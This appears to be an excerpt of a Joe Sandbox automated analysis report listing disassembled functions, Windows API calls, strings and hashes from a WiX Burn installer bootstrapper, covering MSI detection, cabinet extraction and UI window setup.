API String ID: 348923985-819636856
Opcode ID: ed0b6ada384ded1abebda79b49eea7bd3928824d6e54dcfccd450b5806456e45
Instruction ID: dd7838c6edb3b2cf3314d9426aa7a36200e4ea23d232568fea7db618218b7792
Opcode Fuzzy Hash: ed0b6ada384ded1abebda79b49eea7bd3928824d6e54dcfccd450b5806456e45
Instruction Fuzzy Hash: E3413B72F41724BBEB60A6B5CC49FAB73AEAB01750F010156FD05E7140EA309E058AE5

Function 006B3870 Relevance: 28.6, APIs: 1, Strings: 15, Instructions: 589COMMON

Download Yara Rule

Strings

UX aborted detect., xrefs: 006B3F5E
Failed to copy the installed ProductCode to the package., xrefs: 006B3B20
Failed to get version for product in machine context: %ls, xrefs: 006B3EB9
Failed to convert version: %ls to DWORD64 for ProductCode: %ls, xrefs: 006B390F
Failed to enum related products., xrefs: 006B3EC3
Failed to get version for product in user unmanaged context: %ls, xrefs: 006B3E97
Failed to get product information for ProductCode: %ls, xrefs: 006B3A1F
UX aborted detect compatible MSI package., xrefs: 006B3B00
msasn1.dll, xrefs: 006B39D6, 006B3ADD, 006B3DB3, 006B3EFE
Failed to query feature state., xrefs: 006B3F2B
Language, xrefs: 006B3CBC
UX aborted detect related MSI package., xrefs: 006B39FF
Invalid state value., xrefs: 006B3F47
msiengine.cpp, xrefs: 006B39F5, 006B3AF6, 006B3F3D, 006B3F54
VersionString, xrefs: 006B38CB, 006B3A52, 006B3BAC, 006B3BE3

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: Failed to convert version: %ls to DWORD64 for ProductCode: %ls$Failed to copy the installed ProductCode to the package.$Failed to enum related products.$Failed to get product information for ProductCode: %ls$Failed to get version for product in machine context: %ls$Failed to get version for product in user unmanaged context: %ls$Failed to query feature state.$Invalid state value.$Language$UX aborted detect compatible MSI package.$UX aborted detect related MSI package.$UX aborted detect.$VersionString$msasn1.dll$msiengine.cpp
API String ID: 1659193697-2574767977
Opcode ID: 9a311bfcd6113b9f32a1a808b8e4150da70cac0a3b68f7a05c43c30b9b773ad8
Instruction ID: 316f4cb15f26ae2b9f37342dd77fa5bd1b8e28de9329e9b04f5922cf9a339b67
Opcode Fuzzy Hash: 9a311bfcd6113b9f32a1a808b8e4150da70cac0a3b68f7a05c43c30b9b773ad8
Instruction Fuzzy Hash: 8B225CB1E00625AFDB259EA4CC81AEEBBBBFF04700F10411AE519AB355D731AE91CB54

Function 006941D2 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,0069515E,?,?,00000000,?,?), ref: 006941FE
InitializeCriticalSection.KERNEL32(000000D0,?,?,0069515E,?,?,00000000,?,?), ref: 00694207
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,0069515E,?,?,00000000,?,?), ref: 0069424D
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,0069515E,?,?,00000000,?,?), ref: 00694257
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,0069515E,?,?,00000000,?,?), ref: 0069426B
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,0069515E,?,?,00000000,?,?), ref: 0069427B
lstrlenW.KERNEL32(burn.filehandle.self,?,?,0069515E,?,?,00000000,?,?), ref: 006942CB
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,0069515E,?,?,00000000,?,?), ref: 006942D5
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,0069515E,?,?,00000000,?,?), ref: 006942E9
lstrlenW.KERNEL32(burn.filehandle.self,?,?,0069515E,?,?,00000000,?,?), ref: 006942F9

Strings

burn.filehandle.attached, xrefs: 00694248, 00694250, 00694255, 00694256, 00694276, 0069439A
burn.filehandle.self, xrefs: 006942C6, 006942CE, 006942D3, 006942D4, 006942F4, 006943C6
Failed to parse file handle: '%ls', xrefs: 0069437D
Missing required parameter for switch: %ls, xrefs: 0069439F
engine.cpp, xrefs: 00694390, 006943BC
Failed to initialize engine section., xrefs: 00694362

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
API String ID: 3039292287-3209860532
Opcode ID: cb2fc917e1fa595306dd92b074c912408344a08f1f0df1631f9b677f770e7eab
Instruction ID: 84a7617c0f58757c6d6bc792fde04fb5fe71192e5b10e80706f747e1c88e08b1
Opcode Fuzzy Hash: cb2fc917e1fa595306dd92b074c912408344a08f1f0df1631f9b677f770e7eab
Instruction Fuzzy Hash: 2D51B571E40215FFCB249B65DC46FAA776EEB05760F02011BF618D7390DB70A951C7A8

Function 006AE563 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 135
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsSetValue.KERNEL32(?,?), ref: 006AE5AE
RegisterClassW.USER32(?), ref: 006AE5DA
GetLastError.KERNEL32 ref: 006AE5E5
CreateWindowExW.USER32(00000080,006E9CC4,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 006AE64C
GetLastError.KERNEL32 ref: 006AE656
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 006AE6F4

Strings

uithread.cpp, xrefs: 006AE609, 006AE67A
WixBurnMessageWindow, xrefs: 006AE5D3, 006AE6EF
Failed to create window., xrefs: 006AE684
Unexpected return value from message pump., xrefs: 006AE6DF
Failed to register window., xrefs: 006AE613

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: 935e6bc7b096b12c33cae9862d9ac95af9f62a600f514790983bba9b43e29130
Instruction ID: fd718b98e85fd60553678862ad1df70a71995dd82a5ccf966827a65e55aac55e
Opcode Fuzzy Hash: 935e6bc7b096b12c33cae9862d9ac95af9f62a600f514790983bba9b43e29130
Instruction Fuzzy Hash: 3A418272E01214EBDF10ABA5DC44ADABFEAEF09750F125126F905EA250D7319D00CBA1

Function 0069C129 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 128fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0069C319,006952FD,?,?,0069533D), ref: 0069C170
GetLastError.KERNEL32(?,0069C319,006952FD,?,?,0069533D,0069533D,00000000,?,00000000), ref: 0069C181
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0069C319,006952FD,?,?,0069533D,0069533D,00000000,?), ref: 0069C1D0
GetCurrentProcess.KERNEL32(000000FF,00000000,?,0069C319,006952FD,?,?,0069533D,0069533D,00000000,?,00000000), ref: 0069C1D6
DuplicateHandle.KERNELBASE(00000000,?,0069C319,006952FD,?,?,0069533D,0069533D,00000000,?,00000000), ref: 0069C1D9
GetLastError.KERNEL32(?,0069C319,006952FD,?,?,0069533D,0069533D,00000000,?,00000000), ref: 0069C1E3
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0069C319,006952FD,?,?,0069533D,0069533D,00000000,?,00000000), ref: 0069C235
GetLastError.KERNEL32(?,0069C319,006952FD,?,?,0069533D,0069533D,00000000,?,00000000), ref: 0069C23F

Strings

feclient.dll, xrefs: 0069C232
Failed to move file pointer to container offset., xrefs: 0069C26D
Failed to duplicate handle to container: %ls, xrefs: 0069C214
crypt32.dll, xrefs: 0069C231
container.cpp, xrefs: 0069C1A5, 0069C207, 0069C263
Failed to open file: %ls, xrefs: 0069C1B2
Failed to open container., xrefs: 0069C28B

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: aee5a4a38522ffc2d6db05b404ccce026e368297c7abd5a1dfe2b7dfe6ad3a20
Instruction ID: eedaf607c57a7d08723fb697885929b673a4f3d18009c4cfb4ae8df85b730c22
Opcode Fuzzy Hash: aee5a4a38522ffc2d6db05b404ccce026e368297c7abd5a1dfe2b7dfe6ad3a20
Instruction Fuzzy Hash: A641CE72640301ABEB209F6A9C45F573BEBEF85760F12412AF919DB391DA31C901DBA4

Function 6C8D14FF Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160registrywindowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000000,00000001), ref: 6C8D154F
LoadIconW.USER32(00000000,00000001), ref: 6C8D155B
LoadCursorW.USER32(00000000,00007F00), ref: 6C8D157E
RegisterClassW.USER32(?), ref: 6C8D15A9
GetLastError.KERNEL32 ref: 6C8D15B4
IsWindow.USER32(?), ref: 6C8D15FB
GetCursorPos.USER32(?), ref: 6C8D160F
MonitorFromPoint.USER32(?,?,00000002), ref: 6C8D1621
GetMonitorInfoW.USER32(00000000,00000002), ref: 6C8D1637
CreateWindowExW.USER32(00000000,6C8EFE40,?,?,?,?,?,?,00000000,00000000,?,?), ref: 6C8D1691
GetLastError.KERNEL32 ref: 6C8D16A1

Strings

(, xrefs: 6C8D162E
WixStandardBootstrapperApplication.cpp, xrefs: 6C8D16C5
WixStdBA, xrefs: 6C8D15A2

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: CursorErrorLastLoadMonitorWindow$ClassCreateFromHandleIconInfoModulePointRegister
String ID: ($WixStandardBootstrapperApplication.cpp$WixStdBA
API String ID: 4193476069-4208313422
Opcode ID: e6fe75a27fb15d21a7d0286f0761848e9774f8e32653e379173946714a1c9801
Instruction ID: 68ca3a3f377b65100b503fa9d5ba66223a4ff958668443627a16451475305225
Opcode Fuzzy Hash: e6fe75a27fb15d21a7d0286f0761848e9774f8e32653e379173946714a1c9801
Instruction Fuzzy Hash: CA518E75A01205AFDF24CFA9DA88A9EBBF5FF49314F154169F905EB250DB30E801CBA0

Function 6C8DC694 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152libraryloadercomCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,?,6C8DCC0B,00000000,00000000,00000000,?,6C8D5200,?), ref: 6C8DC6AE
GetLastError.KERNEL32(?,6C8DCC0B,00000000,00000000,00000000,?,6C8D5200,?), ref: 6C8DC6BA
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 6C8DC6FA
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 6C8DC706
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 6C8DC711
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 6C8DC71B
CoCreateInstance.OLE32(6C8FAB30,00000000,00000001,6C8EF3E0,00000000,?,6C8DCC0B,00000000,00000000,00000000,?,6C8D5200,?), ref: 6C8DC756
ExitProcess.KERNEL32 ref: 6C8DC805

Strings

Wow64EnableWow64FsRedirection, xrefs: 6C8DC708
xmlutil.cpp, xrefs: 6C8DC6DE
Wow64DisableWow64FsRedirection, xrefs: 6C8DC700
Wow64RevertWow64FsRedirection, xrefs: 6C8DC713
kernel32.dll, xrefs: 6C8DC69E
IsWow64Process, xrefs: 6C8DC6F4

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: b7e19c59fe4119a431e25a5e84b73806331eb3ae933a4916cae87827bcad1b78
Instruction ID: 97c19f5d0cf6e3616392012cfc671cb1052614b8d9409a8115bd45bcb5ccb1f1
Opcode Fuzzy Hash: b7e19c59fe4119a431e25a5e84b73806331eb3ae933a4916cae87827bcad1b78
Instruction Fuzzy Hash: 1641F731A01214ABDB31EFADCA54F9E77B4EF0A354F224869E811EB741D731ED018B90

Function 006B1484 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 103COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0069C285,?,00000000,?,0069C319), ref: 006B14BB
GetLastError.KERNEL32(?,0069C285,?,00000000,?,0069C319,006952FD,?,?,0069533D,0069533D,00000000,?,00000000), ref: 006B14C4

Strings

Failed to create begin operation event., xrefs: 006B14F2
Failed to create operation complete event., xrefs: 006B1538
Failed to create extraction thread., xrefs: 006B1584
Failed to copy file name., xrefs: 006B14A6
Failed to wait for operation complete., xrefs: 006B1597
cabextract.cpp, xrefs: 006B14E8, 006B152E, 006B157A
wininet.dll, xrefs: 006B149A

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
API String ID: 545576003-938279966
Opcode ID: 7cfa79ed69ab4c7b5710faa87c5c2aa9e1096413ec1b5174cb80a21e5624be6d
Instruction ID: 8b8f9c9f6dd832a93d3649b5e2702f8192ae82b731b930822ffaa3a43ac012ad
Opcode Fuzzy Hash: 7cfa79ed69ab4c7b5710faa87c5c2aa9e1096413ec1b5174cb80a21e5624be6d
Instruction Fuzzy Hash: CC2108F2A41735BAF72056BA5C51FA72ADFEB44790F030226BC05EB680D660DD4146F5

Function 6C8DAE55 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 295windowkeyboardCOMMON

Download Yara Rule

APIs

GetUpdateRect.USER32(?,00000000,00000000), ref: 6C8DAEE8
BeginPaint.USER32(?,?,?,6C8D55CA,00000000,?,?,?,?), ref: 6C8DAEFD
EndPaint.USER32(?,?,?,?,?,6C8D55CA,00000000,?,?,?,?), ref: 6C8DAF12
GetClientRect.USER32(?,?), ref: 6C8DAF31
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,6C8D55CA,00000000,?), ref: 6C8DAF90
SendMessageW.USER32(?,0000101E,00000000,?), ref: 6C8DAFDA
GetDlgItem.USER32(?,?), ref: 6C8DB062
GetKeyState.USER32(00000010), ref: 6C8DB0F4
GetNextDlgTabItem.USER32(?,?,00000000), ref: 6C8DB109
SetFocus.USER32(00000000,?,6C8D55CA,00000000,?,?,?,?), ref: 6C8DB110
DefWindowProcW.USER32(?,?,?,?,?,00000000,?,?,6C8D55CA,00000000,?,?,?,?), ref: 6C8DB1F9

Strings

open, xrefs: 6C8DB0B3

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: ItemPaintRectWindow$BeginClientFocusMessageMoveNextProcSendStateUpdate
String ID: open
API String ID: 3202820204-2758837156
Opcode ID: 1f548a8803e8855ad553ee341b61e3d6d1c6786666368d978b6c1735753f4b41
Instruction ID: 8ac18504a69f419dd7a8db82641b6a3646674a41a0fb2b73791511d3f9c3a51b
Opcode Fuzzy Hash: 1f548a8803e8855ad553ee341b61e3d6d1c6786666368d978b6c1735753f4b41
Instruction Fuzzy Hash: E4A1B371901115AFDF348F69CE849EEB7B9EF49314F2249A9E61593A44C730F981CBA0

Function 006B0627 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103fileCOMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 006B0657
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 006B066F
GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 006B0674
DuplicateHandle.KERNELBASE(00000000,?,?), ref: 006B0677
GetLastError.KERNEL32(?,?), ref: 006B0681
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 006B06F0
GetLastError.KERNEL32(?,?), ref: 006B06FD

Strings

Failed to add virtual file pointer for cab container., xrefs: 006B06D6
Failed to duplicate handle to cab container., xrefs: 006B06AF
cabextract.cpp, xrefs: 006B06A5, 006B0721
Failed to open cabinet file: %hs, xrefs: 006B072E
<the>.cab, xrefs: 006B0650

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
API String ID: 3030546534-3446344238
Opcode ID: 79d10a03980ce4d110dd0fb7d9aa96d952ddd9d0b9a4b5480f0f60432d835c6e
Instruction ID: 64c063c71797c28de606d67724437ae56d5337b066887fa33f2be3cebe3bff15
Opcode Fuzzy Hash: 79d10a03980ce4d110dd0fb7d9aa96d952ddd9d0b9a4b5480f0f60432d835c6e
Instruction Fuzzy Hash: B431C8B2D42725FBEB205BA68C49E9B7F9EEF08750F120116FD04E7650D7209D5187E4

Function 6C8D51A7 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 152windowCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 6C8D51BD
PostMessageW.USER32(?,-00008064,00000000,00000000), ref: 6C8D5263
KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 6C8D52AC

Part of subcall function 6C8D4E81: PostMessageW.USER32(?,00008068,00000000,?), ref: 6C8D4EBE

Part of subcall function 6C8DB59C: IsDialogMessageW.USER32(?,?), ref: 6C8DB5AC

TranslateMessage.USER32(?), ref: 6C8D5293
DispatchMessageW.USER32(?), ref: 6C8D529D
CoUninitialize.OLE32 ref: 6C8D5339

Strings

Failed to create main window., xrefs: 6C8D5221
Unexpected return value from message pump., xrefs: 6C8D52C5
Failed to initialize data in bootstrapper application., xrefs: 6C8D5206
Failed to initialize theme manager., xrefs: 6C8D51F2
Failed to initialize COM., xrefs: 6C8D51CC

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: Message$Post$CallbackDialogDispatchDispatcherInitializeTranslateUninitializeUser
String ID: Failed to create main window.$Failed to initialize COM.$Failed to initialize data in bootstrapper application.$Failed to initialize theme manager.$Unexpected return value from message pump.
API String ID: 3891601100-138392756
Opcode ID: f34e98fa5a73977a9c49af2d49901869e5775a9281666f91e9a4314851a0c8d1
Instruction ID: 1739e1d92050ec1a96ae278b8203ff4a7872c9fbce748c3575d5b0b1e64d0955
Opcode Fuzzy Hash: f34e98fa5a73977a9c49af2d49901869e5775a9281666f91e9a4314851a0c8d1
Instruction Fuzzy Hash: 9A41EBB17043066FDB355AA8CA40EAE72ADEF49359F024A3AE915D7B40DB34FC098790

Function 6C8DB5FE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90registryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8DCB3D: CoInitialize.OLE32(00000000), ref: 6C8DCB4C
Part of subcall function 6C8DCB3D: InterlockedIncrement.KERNEL32(6C8FAB40), ref: 6C8DCB69
Part of subcall function 6C8DCB3D: CLSIDFromProgID.OLE32(Msxml2.DOMDocument,6C8FAB30,?,?,?,?,?,?,?,6C8D51EC,?), ref: 6C8DCB84
Part of subcall function 6C8DCB3D: CLSIDFromProgID.OLE32(MSXML.DOMDocument,6C8FAB30,?,?,?,?,?,?,?,6C8D51EC,?), ref: 6C8DCB90

LoadCursorA.USER32(00000000,00007F89), ref: 6C8DB62E
GetClassInfoW.USER32(00000000,Button,?), ref: 6C8DB643
GetLastError.KERNEL32(?,?,?,?,?,?,?,6C8D51EC,?), ref: 6C8DB64D
RegisterClassW.USER32(?), ref: 6C8DB693
GetLastError.KERNEL32(?,?,?,?,?,?,?,6C8D51EC,?), ref: 6C8DB69E
GdiplusStartup.GDIPLUS(6C8FAB18,6C8FA1C4,6C8FAB10,?,?,?,?,?,?,?,6C8D51EC,?), ref: 6C8DB6E5
InitCommonControlsEx.COMCTL32(?,00000000,6C8FAB18,6C8FA1C4,6C8FAB10,?,?,?,?,?,?,?,6C8D51EC,?), ref: 6C8DB713

Strings

ThemeHyperLink, xrefs: 6C8DB68C
Button, xrefs: 6C8DB63D
thmutil.cpp, xrefs: 6C8DB671

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: ClassErrorFromLastProg$CommonControlsCursorGdiplusIncrementInfoInitInitializeInterlockedLoadRegisterStartup
String ID: Button$ThemeHyperLink$thmutil.cpp
API String ID: 1186214510-4220003992
Opcode ID: 274fc2e464d41e7eca04f7894a00af3de9f08520352d3870f501a050e5c8d74c
Instruction ID: 10583750cfb130f1591ebe73bb7f5a69faca410753af23abcb21144132097297
Opcode Fuzzy Hash: 274fc2e464d41e7eca04f7894a00af3de9f08520352d3870f501a050e5c8d74c
Instruction Fuzzy Hash: A0318776A40215BBD7319BA99A44FDA7AF4EF09394F024936FD15E7640D7309801CBE0

Function 006B1224 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,006952FD,006952B5,00000000,0069533D), ref: 006B1249
GetLastError.KERNEL32 ref: 006B125C
GetExitCodeThread.KERNELBASE(006DB478,?), ref: 006B129E
GetLastError.KERNEL32 ref: 006B12AC
ResetEvent.KERNEL32(006DB450), ref: 006B12E7
GetLastError.KERNEL32 ref: 006B12F1

Strings

Failed to reset operation complete event., xrefs: 006B1322
Failed to wait for operation complete event., xrefs: 006B128D
cabextract.cpp, xrefs: 006B1280, 006B12D0, 006B1315
Failed to get extraction thread exit code., xrefs: 006B12DD

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: 223290297be2e100f1b99705adcff529e72d4d11d440278b7f766fb9679206cc
Instruction ID: 89471910f83a4553f12225288cfedde12d6200b1c09eb5e2c05dcb43e48cea57
Opcode Fuzzy Hash: 223290297be2e100f1b99705adcff529e72d4d11d440278b7f766fb9679206cc
